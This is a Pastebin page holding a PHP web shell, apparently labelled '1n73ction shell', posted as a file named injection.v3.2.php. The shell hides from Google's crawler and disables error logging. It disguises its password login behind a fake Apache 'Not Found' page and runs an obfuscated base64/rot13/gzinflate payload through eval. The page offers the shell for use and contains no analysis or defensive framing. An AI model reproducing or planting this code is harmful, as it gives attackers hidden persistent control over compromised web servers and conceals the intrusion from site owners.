Advertisement
enos

injection.v3.2.php

May 3rd, 2013
709
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.00 KB | None | 0 0
  1. <?
  2. /* (1n73ction shell v3.1 by x'1n73ct|default pass:" 1n73ction ") */
  3. $auth_pass = "9c80a1eaca699e2fc6b994721f8703bc";
  4. $color = "#00ff00";
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log',NULL);
  14. @ini_set('log_errors',0);
  15. @ini_set('max_execution_time',0);
  16. @ini_set('output_buffering',0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if( get_magic_quotes_gpc() ) {
  22.     function stripslashes_array($array) {
  23.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24.     }
  25.     $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28.     ?>
  29. <h1>Not Found</h1>
  30. <p>The requested URL was not found on this server.</p>
  31. <hr>
  32. <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address>
  33.     <style>
  34.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  35.     </style>
  36.     <center>
  37.     <form method=post>
  38.     <input type=password name=pass>
  39.     </form></center>
  40.     <?php
  41.     exit;
  42. }
  43. if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  44.     if( empty( $auth_pass ) ||
  45.         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
  46.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  47.     else
  48.         printLogin();
  49. function x($inject){eval("\$z=gz" . "inf" . "la" . "te(s" . "t" . "r_r" . "ot" . "13(ba" . "se" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "de(st" . "r" . "_" . "r" . "o" . "t" . "13(" . "gzi" . "nf" . "lat" . "e(" . "bas" . "e6" . "4_d" . "ec" . "ode(\$inject))))));eval(\$z);");}
  50. x("BcFLEkMwAADQA3UR41PtoosYVDCToE3ETklHQv1L3b7v+dTA5E1Vmj3lKq8JUnbFArMm3x6w0SsfmthiFIfpAOZJea99h9vY3n25Av/JpM4TuogsP7sYt/kWd63yMUoIFnpJcBE6OyxpNFWNDAIewUZ+Mupm1pqiuGI9P4aC71blFMl0TLOLF8YFtIbI6HB4DNA2wSKVPGnsAkRdm+7v9gc=");
  51. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement